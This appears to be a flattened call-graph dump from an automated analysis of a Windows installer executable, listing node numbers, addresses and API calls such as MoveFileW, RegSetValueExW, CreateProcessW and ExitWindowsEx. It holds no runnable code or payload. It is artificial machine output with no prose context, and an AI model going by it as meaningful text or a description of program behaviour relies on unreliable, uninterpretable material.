402da6 17 API calls 4173->4174 4175 401682 4174->4175 4176 402da6 17 API calls 4175->4176 4177 40168b 4176->4177 4178 402da6 17 API calls 4177->4178 4179 401694 MoveFileW 4178->4179 4180 4016a7 4179->4180 4186 4016a0 4179->4186 4182 406873 2 API calls 4180->4182 4184 4022f6 4180->4184 4181 401423 24 API calls 4181->4184 4183 4016b6 4182->4183 4183->4184 4185 4062fd 36 API calls 4183->4185 4185->4186 4186->4181 4187 4019ff 4188 402da6 17 API calls 4187->4188 4189 401a06 4188->4189 4190 402da6 17 API calls 4189->4190 4191 401a0f 4190->4191 4192 401a16 lstrcmpiW 4191->4192 4193 401a28 lstrcmpW 4191->4193 4194 401a1c 4192->4194 4193->4194 4195 4022ff 4196 402da6 17 API calls 4195->4196 4197 402305 4196->4197 4198 402da6 17 API calls 4197->4198 4199 40230e 4198->4199 4200 402da6 17 API calls 4199->4200 4201 402317 4200->4201 4202 406873 2 API calls 4201->4202 4203 402320 4202->4203 4204 402331 lstrlenW lstrlenW 4203->4204 4208 402324 4203->4208 4205 40559f 24 API calls 4204->4205 4207 40236f SHFileOperationW 4205->4207 4206 40559f 24 API calls 4209 40232c 4206->4209 4207->4208 4207->4209 4208->4206 4208->4209 4210 401000 4211 401037 BeginPaint GetClientRect 4210->4211 4212 40100c DefWindowProcW 4210->4212 4214 4010f3 4211->4214 4217 401179 4212->4217 4215 401073 CreateBrushIndirect FillRect DeleteObject 4214->4215 4216 4010fc 4214->4216 4215->4214 4218 401102 CreateFontIndirectW 4216->4218 4219 401167 EndPaint 4216->4219 4218->4219 4220 401112 6 API calls 4218->4220 4219->4217 4220->4219 4221 401d81 4222 401d94 GetDlgItem 4221->4222 4223 401d87 4221->4223 4225 401d8e 4222->4225 4224 402d84 17 API calls 4223->4224 4224->4225 4226 402da6 17 API calls 4225->4226 4229 401dd5 GetClientRect LoadImageW SendMessageW 4225->4229 4226->4229 4228 401e33 4230 401e38 DeleteObject 4228->4230 4231 401e3f 4228->4231 4229->4228 4229->4231 4230->4231 4232 401503 4233 40150b 4232->4233 4235 40151e 4232->4235 4234 402d84 17 API calls 4233->4234 4234->4235 4236 402383 4237 40238a 4236->4237 4240 40239d 4236->4240 4238 40657a 17 API calls 4237->4238 4239 402397 4238->4239 4241 405b9d MessageBoxIndirectW 4239->4241 4241->4240 4242 402c05 SendMessageW 4243 402c2a 4242->4243 4244 402c1f InvalidateRect 4242->4244 4244->4243 3194 404f06 GetDlgItem GetDlgItem 3195 404f58 7 API calls 3194->3195 3202 40517d 3194->3202 3196 404ff2 SendMessageW 3195->3196 3197 404fff DeleteObject 3195->3197 3196->3197 3198 405008 3197->3198 3199 40503f 3198->3199 3203 40657a 17 API calls 3198->3203 3249 404499 3199->3249 3200 40525f 3205 40530b 3200->3205 3211 4054fe 3200->3211 3216 4052b8 SendMessageW 3200->3216 3201 405240 3201->3200 3212 405251 SendMessageW 3201->3212 3202->3200 3202->3201 3208 4051db 3202->3208 3209 405021 SendMessageW SendMessageW 3203->3209 3206 405315 SendMessageW 3205->3206 3207 40531d 3205->3207 3206->3207 3218 405336 3207->3218 3219 40532f ImageList_Destroy 3207->3219 3235 405346 3207->3235 3257 404e54 SendMessageW 3208->3257 3209->3198 3210 405053 3215 404499 18 API calls 3210->3215 3271 404500 3211->3271 3212->3200 3230 405064 3215->3230 3216->3211 3221 4052cd SendMessageW 3216->3221 3222 40533f GlobalFree 3218->3222 3218->3235 3219->3218 3220 4054c0 3220->3211 3225 4054d2 ShowWindow GetDlgItem ShowWindow 3220->3225 3224 4052e0 3221->3224 3222->3235 3223 40513f GetWindowLongW SetWindowLongW 3226 405158 3223->3226 3236 4052f1 SendMessageW 3224->3236 3225->3211 3227 405175 3226->3227 3228 40515d ShowWindow 3226->3228 3256 4044ce SendMessageW 3227->3256 3255 4044ce SendMessageW 3228->3255 3229 4051ec 3229->3201 3230->3223 3231 40513a 3230->3231 3234 4050b7 SendMessageW 3230->3234 3238 4050f5 SendMessageW 3230->3238 3239 405109 SendMessageW 3230->3239 3231->3223 3231->3226 3234->3230 3235->3220 3242 405381 3235->3242 3262 404ed4 3235->3262 3236->3205 3237 405170 3237->3211 3238->3230 3239->3230 3241 40548b 3243 405496 InvalidateRect 3241->3243 3246 4054a2 3241->3246 3244 4053af SendMessageW 3242->3244 3245 4053c5 3242->3245 3243->3246 3244->3245 3245->3241 3247 405439 SendMessageW SendMessageW 3245->3247 3246->3220 3252 404e0f 3246->3252 3247->3245 3250 40657a 17 API calls 3249->3250 3251 4044a4 SetDlgItemTextW 3250->3251 3251->3210 3285 404d46 3252->3285 3254 404e24 3254->3220 3255->3237 3256->3202 3258 404eb3 SendMessageW 3257->3258 3259 404e77 GetMessagePos ScreenToClient SendMessageW 3257->3259 3261 404eab 3258->3261 3260 404eb0 3259->3260 3259->3261 3260->3258 3261->3229 3293 40653d lstrcpynW 3262->3293 3264 404ee7 3294 406484 wsprintfW 3264->3294 3266 404ef1 3295 40140b 3266->3295 3270 404f01 3270->3242 3272 4045c3 3271->3272 3273 404518 GetWindowLongW 3271->3273 3273->3272 3274 40452d 3273->3274 3274->3272 3275 40455a GetSysColor 3274->3275 3276 40455d 3274->3276 3275->3276 3277 404563 SetTextColor 3276->3277 3278 40456d SetBkMode 3276->3278 3277->3278 3279 404585 GetSysColor 3278->3279 3280 40458b 3278->3280 3279->3280 3281 404592 SetBkColor 3280->3281 3282 40459c 3280->3282 3281->3282 3282->3272 3283 4045b6 CreateBrushIndirect 3282->3283 3284 4045af DeleteObject 3282->3284 3283->3272 3284->3283 3286 404d5f 3285->3286 3287 40657a 17 API calls 3286->3287 3288 404dc3 3287->3288 3289 40657a 17 API calls 3288->3289 3290 404dce 3289->3290 3291 40657a 17 API calls 3290->3291 3292 404de4 lstrlenW wsprintfW SetDlgItemTextW 3291->3292 3292->3254 3293->3264 3294->3266 3299 401389 3295->3299 3298 40653d lstrcpynW 3298->3270 3301 401390 3299->3301 3300 4013fe 3300->3298 3301->3300 3302 4013cb MulDiv SendMessageW 3301->3302 3302->3301 4245 404609 lstrlenW 4246 404628 4245->4246 4247 40462a WideCharToMultiByte 4245->4247 4246->4247 3303 40248a 3304 402da6 17 API calls 3303->3304 3305 40249c 3304->3305 3306 402da6 17 API calls 3305->3306 3307 4024a6 3306->3307 3320 402e36 3307->3320 3310 40292e 3311 4024de 3313 4024ea 3311->3313 3315 402d84 17 API calls 3311->3315 3312 402da6 17 API calls 3314 4024d4 lstrlenW 3312->3314 3316 402509 RegSetValueExW 3313->3316 3324 4032b4 3313->3324 3314->3311 3315->3313 3317 40251f RegCloseKey 3316->3317 3317->3310 3321 402e51 3320->3321 3344 4063d8 3321->3344 3325 4032cd 3324->3325 3326 4032fb 3325->3326 3351 4034e5 SetFilePointer 3325->3351 3348 4034cf 3326->3348 3330 403468 3332 4034aa 3330->3332 3336 40346c 3330->3336 3331 403318 GetTickCount 3338 403452 3331->3338 3343 403367 3331->3343 3333 4034cf ReadFile 3332->3333 3333->3338 3334 4034cf ReadFile 3334->3343 3335 4034cf ReadFile 3335->3336 3336->3335 3337 4060df WriteFile 3336->3337 3336->3338 3337->3336 3338->3316 3339 4033bd GetTickCount 3339->3343 3340 4033e2 MulDiv wsprintfW 3341 40559f 24 API calls 3340->3341 3341->3343 3342 4060df WriteFile 3342->3343 3343->3334 3343->3338 3343->3339 3343->3340 3343->3342 3345 4063e7 3344->3345 3346 4063f2 RegCreateKeyExW 3345->3346 3347 4024b6 3345->3347 3346->3347 3347->3310 3347->3311 3347->3312 3349 4060b0 ReadFile 3348->3349 3350 403306 3349->3350 3350->3330 3350->3331 3350->3338 3351->3326 4248 40498a 4249 4049b6 4248->4249 4250 4049c7 4248->4250 4309 405b81 GetDlgItemTextW 4249->4309 4252 4049d3 GetDlgItem 4250->4252 4257 404a32 4250->4257 4254 4049e7 4252->4254 4253 4049c1 4256 4067c4 5 API calls 4253->4256 4259 4049fb SetWindowTextW 4254->4259 4264 405eb7 4 API calls 4254->4264 4255 404b16 4307 404cc5 4255->4307 4311 405b81 GetDlgItemTextW 4255->4311 4256->4250 4257->4255 4261 40657a 17 API calls 4257->4261 4257->4307 4262 404499 18 API calls 4259->4262 4260 404b46 4265 405f14 18 API calls 4260->4265 4266 404aa6 SHBrowseForFolderW 4261->4266 4267 404a17 4262->4267 4263 404500 8 API calls 4268 404cd9 4263->4268 4269 4049f1 4264->4269 4270 404b4c 4265->4270 4266->4255 4271 404abe CoTaskMemFree 4266->4271 4272 404499 18 API calls 4267->4272 4269->4259 4273 405e0c 3 API calls 4269->4273 4312 40653d lstrcpynW 4270->4312 4274 405e0c 3 API calls 4271->4274 4275 404a25 4272->4275 4273->4259 4276 404acb 4274->4276 4310 4044ce SendMessageW 4275->4310 4279 404b02 SetDlgItemTextW 4276->4279 4284 40657a 17 API calls 4276->4284 4279->4255 4280 404a2b 4282 40690a 5 API calls 4280->4282 4281 404b63 4283 40690a 5 API calls 4281->4283 4282->4257 4291 404b6a 4283->4291 4285 404aea lstrcmpiW 4284->4285 4285->4279 4288 404afb lstrcatW 4285->4288 4286 404bab 4313 40653d lstrcpynW 4286->4313 4288->4279 4289 404bb2 4290 405eb7 4 API calls 4289->4290 4292 404bb8 GetDiskFreeSpaceW 4290->4292 4291->4286 4294 405e58 2 API calls 4291->4294 4296 404c03 4291->4296 4295 404bdc MulDiv 4292->4295 4292->4296 4294->4291 4295->4296 4297 404c74 4296->4297 4298 404e0f 20 API calls 4296->4298 4299 404c97 4297->4299 4300 40140b 2 API calls 4297->4300 4301 404c61 4298->4301 4314 4044bb KiUserCallbackDispatcher 4299->4314 4300->4299 4303 404c76 SetDlgItemTextW 4301->4303 4304 404c66 4301->4304 4303->4297 4306 404d46 20 API calls 4304->4306 4305 404cb3 4305->4307 4308 4048e3 SendMessageW 4305->4308 4306->4297 4307->4263 4308->4307 4309->4253 4310->4280 4311->4260 4312->4281 4313->4289 4314->4305 3385 40290b 3386 402da6 17 API calls 3385->3386 3387 402912 FindFirstFileW 3386->3387 3388 40293a 3387->3388 3392 402925 3387->3392 3393 406484 wsprintfW 3388->3393 3390 402943 3394 40653d lstrcpynW 3390->3394 3393->3390 3394->3392 4315 40190c 4316 401943 4315->4316 4317 402da6 17 API calls 4316->4317 4318 401948 4317->4318 4319 405c49 67 API calls 4318->4319 4320 401951 4319->4320 4321 40190f 4322 402da6 17 API calls 4321->4322 4323 401916 4322->4323 4324 405b9d MessageBoxIndirectW 4323->4324 4325 40191f 4324->4325 3705 402891 3706 402898 3705->3706 3708 402ba9 3705->3708 3707 402d84 17 API calls 3706->3707 3709 40289f 3707->3709 3710 4028ae SetFilePointer 3709->3710 3710->3708 3711 4028be 3710->3711 3713 406484 wsprintfW 3711->3713 3713->3708 4326 401491 4327 40559f 24 API calls 4326->4327 4328 401498 4327->4328 3714 403b12 3715 403b2a 3714->3715 3716 403b1c CloseHandle 3714->3716 3721 403b57 3715->3721 3716->3715 3719 405c49 67 API calls 3720 403b3b 3719->3720 3723 403b65 3721->3723 3722 403b2f 3722->3719 3723->3722 3724 403b6a FreeLibrary GlobalFree 3723->3724 3724->3722 3724->3724 4329 401f12 4330 402da6 17 API calls 4329->4330 4331 401f18 4330->4331 4332 402da6 17 API calls 4331->4332 4333 401f21 4332->4333 4334 402da6 17 API calls 4333->4334 4335 401f2a 4334->4335 4336 402da6 17 API calls 4335->4336 4337 401f33 4336->4337 4338 401423 24 API calls 4337->4338 4339 401f3a 4338->4339 4346 405b63 ShellExecuteExW 4339->4346 4341 401f82 4342 40292e 4341->4342 4343 4069b5 5 API calls 4341->4343 4344 401f9f CloseHandle 4343->4344 4344->4342 4346->4341 3725 405513 3726 405523 3725->3726 3727 405537 3725->3727 3728 405580 3726->3728 3729 405529 3726->3729 3730 40553f IsWindowVisible 3727->3730 3737 40555f 3727->3737 3731 405585 CallWindowProcW 3728->3731 3732 4044e5 SendMessageW 3729->3732 3730->3728 3733 40554c 3730->3733 3734 405533 3731->3734 3732->3734 3735 404e54 5 API calls 3733->3735 3736 405556 3735->3736 3736->3737 3737->3731 3738 404ed4 4 API calls 3737->3738 3738->3728 4347 402f93 4348 402fa5 SetTimer 4347->4348 4349 402fbe 4347->4349 4348->4349 4350 403013 4349->4350 4351 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4349->4351 4351->4350 4352 401d17 4353 402d84 17 API calls 4352->4353 4354 401d1d IsWindow 4353->4354 4355 401a20 4354->4355 3802 403f9a 3803 403fb2 3802->3803 3804 404113 3802->3804 3803->3804 3805 403fbe 3803->3805 3806 404164 3804->3806 3807 404124 GetDlgItem GetDlgItem 3804->3807 3808 403fc9 SetWindowPos 3805->3808 3809 403fdc 3805->3809 3811 4041be 3806->3811 3822 401389 2 API calls 3806->3822 3810 404499 18 API calls 3807->3810 3808->3809 3813 403fe5 ShowWindow 3809->3813 3814 404027 3809->3814 3815 40414e SetClassLongW 3810->3815 3812 4044e5 SendMessageW 3811->3812 3816 40410e 3811->3816 3844 4041d0 3812->3844 3817 4040d1 3813->3817 3818 404005 GetWindowLongW 3813->3818 3819 404046 3814->3819 3820 40402f DestroyWindow 3814->3820 3821 40140b 2 API calls 3815->3821 3823 404500 8 API calls 3817->3823 3818->3817 3824 40401e ShowWindow 3818->3824 3826 40404b SetWindowLongW 3819->3826 3827 40405c 3819->3827 3825 404422 3820->3825 3821->3806 3828 404196 3822->3828 3823->3816 3824->3814 3825->3816 3833 404453 ShowWindow 3825->3833 3826->3816 3827->3817 3831 404068 GetDlgItem 3827->3831 3828->3811 3832 40419a SendMessageW 3828->3832 3829 40140b 2 API calls 3829->3844 3830 404424 DestroyWindow KiUserCallbackDispatcher 3830->3825 3834 404096 3831->3834 3835 404079 SendMessageW IsWindowEnabled 3831->3835 3832->3816 3833->3816 3837 4040a3 3834->3837 3838 4040ea SendMessageW 3834->3838 3839 4040b6 3834->3839 3847 40409b 3834->3847 3835->3816 3835->3834 3836 40657a 17 API calls 3836->3844 3837->3838 3837->3847 3838->3817 3842 4040d3 3839->3842 3843 4040be 3839->3843 3841 404499 18 API calls 3841->3844 3846 40140b 2 API calls 3842->3846 3845 40140b 2 API calls 3843->3845 3844->3816 3844->3829 3844->3830 3844->3836 3844->3841 3848 404499 18 API calls 3844->3848 3864 404364 DestroyWindow 3844->3864 3845->3847 3846->3847 3847->3817 3876 404472 3847->3876 3849 40424b GetDlgItem 3848->3849 3850 404260 3849->3850 3851 404268 ShowWindow KiUserCallbackDispatcher 3849->3851 3850->3851 3873 4044bb KiUserCallbackDispatcher 3851->3873 3853 404292 KiUserCallbackDispatcher 3858 4042a6 3853->3858 3854 4042ab GetSystemMenu EnableMenuItem SendMessageW 3855 4042db SendMessageW 3854->3855 3854->3858 3855->3858 3857 403f7b 18 API calls 3857->3858 3858->3854 3858->3857 3874 4044ce SendMessageW 3858->3874 3875 40653d lstrcpynW 3858->3875 3860 40430a lstrlenW 3861 40657a 17 API calls 3860->3861 3862 404320 SetWindowTextW 3861->3862 3863 401389 2 API calls 3862->3863 3863->3844 3864->3825 3865 40437e CreateDialogParamW 3864->3865 3865->3825 3866 4043b1 3865->3866 3867 404499 18 API calls 3866->3867 3868 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3867->3868 3869 401389 2 API calls 3868->3869 3870 404402 3869->3870 3870->3816 3871 40440a ShowWindow 3870->3871 3872 4044e5 SendMessageW 3871->3872 3872->3825 3873->3853 3874->3858 3875->3860 3877 404479 3876->3877 3878 40447f SendMessageW 3876->3878 3877->3878 3878->3817 3879 401b9b 3880 401ba8 3879->3880 3881 401bec 3879->3881 3884 401c31 3880->3884 3889 401bbf 3880->3889 3882 401bf1 3881->3882 3883 401c16 GlobalAlloc 3881->3883 3895 40239d 3882->3895 3900 40653d lstrcpynW 3882->3900 3886 40657a 17 API calls 3883->3886 3885 40657a 17 API calls 3884->3885 3884->3895 3887 402397 3885->3887 3886->3884 3892 405b9d MessageBoxIndirectW 3887->3892 3898 40653d lstrcpynW 3889->3898 3890 401c03 GlobalFree 3890->3895 3892->3895 3893 401bce 3899 40653d lstrcpynW 3893->3899 3896 401bdd 3901 40653d lstrcpynW 3896->3901 3898->3893 3899->3896 3900->3890 3901->3895 4356 40261c 4357 402da6 17 API calls 4356->4357 4358 402623 4357->4358 4361 40602d GetFileAttributesW CreateFileW 4358->4361 4360 40262f 4361->4360 3964 40259e 3965 402de6 17 API calls 3964->3965 3966 4025a8 3965->3966 3967 402d84 17 API calls 3966->3967 3968 4025b1 3967->3968 3969 40292e 3968->3969 3970 4025d9 RegEnumValueW 3968->3970 3971 4025cd RegEnumKeyW 3968->3971 3972 4025ee 3970->3972 3973 4025f5 RegCloseKey 3970->3973 3971->3973 3972->3973 3973->3969 4362 40149e 4363 4014ac PostQuitMessage 4362->4363 4364 40239d 4362->4364 4363->4364 4365 4015a3 4366 402da6 17 API calls 4365->4366 4367 4015aa SetFileAttributesW 4366->4367 4368 4015bc 4367->4368 3168 401fa4 3169 402da6 17 API calls 3168->3169 3170 401faa 3169->3170 3171 40559f 24 API calls 3170->3171 3172 401fb4 3171->3172 3181 405b20 CreateProcessW 3172->3181 3175 401fdd CloseHandle 3178 40292e 3175->3178 3179 401fcf 3179->3175 3189 406484 wsprintfW 3179->3189 3182 405b53 CloseHandle 3181->3182 3183 401fba 3181->3183 3182->3183 3183->3175 3183->3178 3184 4069b5 WaitForSingleObject 3183->3184 3185 4069cf 3184->3185 3186 4069e1 GetExitCodeProcess 3185->3186 3190 406946 3185->3190 3186->3179 3189->3175 3191 406963 PeekMessageW 3190->3191 3192 406973 WaitForSingleObject 3191->3192 3193 406959 DispatchMessageW 3191->3193 3192->3185 3193->3191 3352 4021aa 3353 402da6 17 API calls 3352->3353 3354 4021b1 3353->3354 3355 402da6 17 API calls 3354->3355 3356 4021bb 3355->3356 3357 402da6 17 API calls 3356->3357 3358 4021c5 3357->3358 3359 402da6 17 API calls 3358->3359 3360 4021cf 3359->3360 3361 402da6 17 API calls 3360->3361 3362 4021d9 3361->3362 3363 402218 CoCreateInstance 3362->3363 3364 402da6 17 API calls 3362->3364 3367 402237 3363->3367 3364->3363 3365 401423 24 API calls 3366 4022f6 3365->3366 3367->3365 3367->3366 3368 40252a 3379 402de6 3368->3379 3371 402da6 17 API calls 3372 40253d 3371->3372 3373 402548 RegQueryValueExW 3372->3373 3378 40292e 3372->3378 3374 40256e RegCloseKey 3373->3374 3375 402568 3373->3375 3374->3378 3375->3374 3384 406484 wsprintfW 3375->3384 3380 402da6 17 API calls 3379->3380 3381 402dfd 3380->3381 3382 4063aa RegOpenKeyExW 3381->3382 3383 402534 3382->3383 3383->3371 3384->3374 4369 40202a 4370 402da6 17 API calls 4369->4370 4371 402031 4370->4371 4372 40690a 5 API calls 4371->4372 4373 402040 4372->4373 4374 40205c GlobalAlloc 4373->4374 4377 4020cc 4373->4377 4375 402070 4374->4375 4374->4377 4376 40690a 5 API calls 4375->4376 4378 402077 4376->4378 4379 40690a 5 API calls 4378->4379 4380 402081 4379->4380 4380->4377 4384 406484 wsprintfW 4380->4384 4382 4020ba 4385 406484 wsprintfW 4382->4385 4384->4382 4385->4377 4386 403baa 4387 403bb5 4386->4387 4388 403bbc GlobalAlloc 4387->4388 4389 403bb9 4387->4389 4388->4389 3395 40352d SetErrorMode GetVersionExW 3396 4035b7 3395->3396 3397 40357f GetVersionExW 3395->3397 3398 403610 3396->3398 3399 40690a 5 API calls 3396->3399 3397->3396 3400 40689a 3 API calls 3398->3400 3399->3398 3401 403626 lstrlenA 3400->3401 3401->3398 3402 403636 3401->3402 3403 40690a 5 API calls 3402->3403 3404 40363d 3403->3404 3405 40690a 5 API calls 3404->3405 3406 403644 3405->3406 3407 40690a 5 API calls 3406->3407 3411 403650 #17 OleInitialize SHGetFileInfoW 3407->3411 3410 40369d GetCommandLineW 3486 40653d lstrcpynW 3410->3486 3485 40653d lstrcpynW 3411->3485 3413 4036af 3414 405e39 CharNextW 3413->3414 3415 4036d5 CharNextW 3414->3415 3427 4036e6 3415->3427 3416 4037e4 3417 4037f8 GetTempPathW 3416->3417 3487 4034fc 3417->3487 3419 403810 3421 403814 GetWindowsDirectoryW lstrcatW 3419->3421 3422 40386a DeleteFileW 3419->3422 3420 405e39 CharNextW 3420->3427 3423 4034fc 12 API calls 3421->3423 3497 40307d GetTickCount GetModuleFileNameW 3422->3497 3425 403830 3423->3425 3425->3422 3428 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3425->3428 3426 40387d 3430 403a59 ExitProcess CoUninitialize 3426->3430 3432 403932 3426->3432 3440 405e39 CharNextW 3426->3440 3427->3416 3427->3420 3429 4037e6 3427->3429 3431 4034fc 12 API calls 3428->3431 3581 40653d lstrcpynW 3429->3581 3434 403a69 3430->3434 3435 403a7e 3430->3435 3439 403862 3431->3439 3525 403bec 3432->3525 3586 405b9d 3434->3586 3437 403a86 GetCurrentProcess OpenProcessToken 3435->3437 3438 403afc ExitProcess 3435->3438 3443 403acc 3437->3443 3444 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3437->3444 3439->3422 3439->3430 3454 40389f 3440->3454 3447 40690a 5 API calls 3443->3447 3444->3443 3445 403941 3445->3430 3450 403ad3 3447->3450 3448 403908 3451 405f14 18 API calls 3448->3451 3449 403949 3453 405b08 5 API calls 3449->3453 3452 403ae8 ExitWindowsEx 3450->3452 3456 403af5 3450->3456 3455 403914 3451->3455 3452->3438 3452->3456 3457 40394e lstrcatW 3453->3457 3454->3448 3454->3449 3455->3430 3582 40653d lstrcpynW 3455->3582 3460 40140b 2 API calls 3456->3460 3458 40396a lstrcatW lstrcmpiW 3457->3458 3459 40395f lstrcatW 3457->3459 3458->3445 3461 40398a 3458->3461 3459->3458 3460->3438 3463 403996 3461->3463 3464 40398f 3461->3464 3467 405aeb 2 API calls 3463->3467 3466 405a6e 4 API calls 3464->3466 3465 403927 3583 40653d lstrcpynW 3465->3583 3469 403994 3466->3469 3470 40399b SetCurrentDirectoryW 3467->3470 3469->3470 3471 4039b8 3470->3471 3472 4039ad 3470->3472 3585 40653d lstrcpynW 3471->3585 3584 40653d lstrcpynW 3472->3584 3475 40657a 17 API calls 3476 4039fa DeleteFileW 3475->3476 3477 403a06 CopyFileW 3476->3477 3482 4039c5 3476->3482 3477->3482 3478 403a50 3480 4062fd 36 API calls 3478->3480 3479 4062fd 36 API calls 3479->3482 3480->3445 3481 40657a 17 API calls 3481->3482 3482->3475 3482->3478 3482->3479 3482->3481 3483 405b20 2 API calls 3482->3483 3484 403a3a CloseHandle 3482->3484 3483->3482 3484->3482 3485->3410 3486->3413 3488 4067c4 5 API calls 3487->3488 3490 403508 3488->3490 3489 403512 3489->3419 3490->3489 3491 405e0c 3 API calls 3490->3491 3492 40351a 3491->3492 3493 405aeb 2 API calls 3492->3493 3494 403520 3493->3494 3590 40605c 3494->3590 3594 40602d GetFileAttributesW CreateFileW 3497->3594 3499 4030bd 3517 4030cd 3499->3517 3595 40653d lstrcpynW 3499->3595 3501 4030e3 3502 405e58 2 API calls 3501->3502 3503 4030e9 3502->3503 3596 40653d lstrcpynW 3503->3596 3505 4030f4 GetFileSize 3506 4031ee 3505->3506 3524 40310b 3505->3524 3597 403019 3506->3597 3508 4031f7 3510 403227 GlobalAlloc 3508->3510 3508->3517 3609 4034e5 SetFilePointer 3508->3609 3509 4034cf ReadFile 3509->3524 3608 4034e5 SetFilePointer 3510->3608 3512 40325a 3514 403019 6 API calls 3512->3514 3514->3517 3515 403210 3518 4034cf ReadFile 3515->3518 3516 403242 3519 4032b4 31 API calls 3516->3519 3517->3426 3520 40321b 3518->3520 3522 40324e 3519->3522 3520->3510 3520->3517 3521 403019 6 API calls 3521->3524 3522->3517 3522->3522 3523 40328b SetFilePointer 3522->3523 3523->3517 3524->3506 3524->3509 3524->3512 3524->3517 3524->3521 3526 40690a 5 API calls 3525->3526 3527 403c00 3526->3527 3528 403c06 3527->3528 3529 403c18 3527->3529 3625 406484 wsprintfW 3528->3625 3530 40640b 3 API calls 3529->3530 3531 403c48 3530->3531 3532 403c67 lstrcatW 3531->3532 3534 40640b 3 API calls 3531->3534 3535 403c16 3532->3535 3534->3532 3610 403ec2 3535->3610 3538 405f14 18 API calls 3539 403c99 3538->3539 3540 403d2d 3539->3540 3542 40640b 3 API calls 3539->3542 3541 405f14 18 API calls 3540->3541 3543 403d33 3541->3543 3544 403ccb 3542->3544 3545 403d43 LoadImageW 3543->3545 3548 40657a 17 API calls 3543->3548 3544->3540 3552 403cec lstrlenW 3544->3552 3556 405e39 CharNextW 3544->3556 3546 403de9 3545->3546 3547 403d6a RegisterClassW 3545->3547 3551 40140b 2 API calls 3546->3551 3549 403da0 SystemParametersInfoW CreateWindowExW 3547->3549 3550 403df3 3547->3550 3548->3545 3549->3546 3550->3445 3555 403def 3551->3555 3553 403d20 3552->3553 3554 403cfa lstrcmpiW 3552->3554 3559 405e0c 3 API calls 3553->3559 3554->3553 3558 403d0a GetFileAttributesW 3554->3558 3555->3550 3561 403ec2 18 API calls 3555->3561 3557 403ce9 3556->3557 3557->3552 3560 403d16 3558->3560 3562 403d26 3559->3562 3560->3553 3563 405e58 2 API calls 3560->3563 3564 403e00 3561->3564 3626 40653d lstrcpynW 3562->3626 3563->3553 3566 403e0c ShowWindow 3564->3566 3567 403e8f 3564->3567 3569 40689a 3 API calls 3566->3569 3618 405672 OleInitialize 3567->3618 3571 403e24 3569->3571 3570 403e95 3572 403eb1 3570->3572 3573 403e99 3570->3573 3574 403e32 GetClassInfoW 3571->3574 3578 40689a 3 API calls 3571->3578 3577 40140b 2 API calls 3572->3577 3573->3550 3580 40140b 2 API calls 3573->3580 3575 403e46 GetClassInfoW RegisterClassW 3574->3575 3576 403e5c DialogBoxParamW 3574->3576 3575->3576 3579 40140b 2 API calls 3576->3579 3577->3550 3578->3574 3579->3550 3580->3550 3581->3417 3582->3465 3583->3432 3584->3471 3585->3482 3587 405bb2 3586->3587 3588 405bc6 MessageBoxIndirectW 3587->3588 3589 403a76 ExitProcess 3587->3589 3588->3589 3591 406069 GetTickCount GetTempFileNameW 3590->3591 3592 40352b 3591->3592 3593 40609f 3591->3593 3592->3419 3593->3591 3593->3592 3594->3499 3595->3501 3596->3505 3598 403022 3597->3598 3599 40303a 3597->3599 3600 403032 3598->3600 3601 40302b DestroyWindow 3598->3601 3602 403042 3599->3602 3603 40304a GetTickCount 3599->3603 3600->3508 3601->3600 3604 406946 2 API calls 3602->3604 3605 403058 CreateDialogParamW ShowWindow 3603->3605 3606 40307b 3603->3606 3607 403048 3604->3607 3605->3606 3606->3508 3607->3508 3608->3516 3609->3515 3611 403ed6 3610->3611 3627 406484 wsprintfW 3611->3627 3613 403f47 3628 403f7b 3613->3628 3615 403c77 3615->3538 3616 403f4c 3616->3615 3617 40657a 17 API calls 3616->3617 3617->3616 3631 4044e5 3618->3631 3620 405695 3623 401389 2 API calls 3620->3623 3624 4056bc 3620->3624 3621 4044e5 SendMessageW 3622 4056ce CoUninitialize 3621->3622 3622->3570 3623->3620 3624->3621 3625->3535 3626->3540 3627->3613 3629 40657a 17 API calls 3628->3629 3630 403f89 SetWindowTextW 3629->3630 3630->3616 3632 4044fd 3631->3632 3633 4044ee SendMessageW 3631->3633 3632->3620 3633->3632 4390 401a30 4391 402da6 17 API calls 4390->4391 4392 401a39 ExpandEnvironmentStringsW 4391->4392 4393 401a4d 4392->4393 4395 401a60 4392->4395 4394 401a52 lstrcmpW 4393->4394 4393->4395 4394->4395 4401 4023b2 4402 4023ba 4401->4402 4404 4023c0 4401->4404 4403 402da6 17 API calls 4402->4403 4403->4404 4405 402da6 17 API calls 4404->4405 4406 4023ce 4404->4406 4405->4406 4407 4023dc 4406->4407 4408 402da6 17 API calls 4406->4408 4409 402da6 17 API calls 4407->4409 4408->4407 4410 4023e5 WritePrivateProfileStringW 4409->4410 3739 402434 3740 402467 3739->3740 3741 40243c 3739->3741 3742 402da6 17 API calls 3740->3742 3743 402de6 17 API calls 3741->3743 3744 40246e 3742->3744 3745 402443 3743->3745 3750 402e64 3744->3750 3747 40247b 3745->3747 3748 402da6 17 API calls 3745->3748 3749 402454 RegDeleteValueW RegCloseKey 3748->3749 3749->3747 3751 402e71 3750->3751 3752 402e78 3750->3752 3751->3747 3752->3751 3754 402ea9 3752->3754 3755 4063aa RegOpenKeyExW 3754->3755 3756 402ed7 3755->3756 3757 402ee1 3756->3757 3758 402f8c 3756->3758 3759 402ee7 RegEnumValueW 3757->3759 3766 402f0a 3757->3766 3758->3751 3761 402f71 RegCloseKey 3759->3761 3759->3766 3760 402f46 RegEnumKeyW 3762 402f4f RegCloseKey 3760->3762 3760->3766 3761->3758 3763 40690a 5 API calls 3762->3763 3765 402f5f 3763->3765 3764 402ea9 6 API calls 3764->3766 3767 402f81 3765->3767 3768 402f63 RegDeleteKeyW 3765->3768 3766->3760 3766->3761 3766->3762 3766->3764 3767->3758 3768->3758 4411 401735 4412 402da6 17 API calls 4411->4412 4413 40173c SearchPathW 4412->4413 4414 401757 4413->4414 4415 401d38 4416 402d84 17 API calls 4415->4416 4417 401d3f 4416->4417 4418 402d84 17 API calls 4417->4418 4419 401d4b GetDlgItem 4418->4419 4420 402638 4419->4420 4421 4014b8 4422 4014be 4421->4422 4423 401389 2 API calls 4422->4423 4424 4014c6 4423->4424 4425 40263e 4426 402652 4425->4426 4427 40266d 4425->4427 4428 402d84 17 API calls 4426->4428 4429 402672 4427->4429 4430 40269d 4427->4430 4437 402659 4428->4437 4431 402da6 17 API calls 4429->4431 4432 402da6 17 API calls 4430->4432 4434 402679 4431->4434 4433 4026a4 lstrlenW 4432->4433 4433->4437 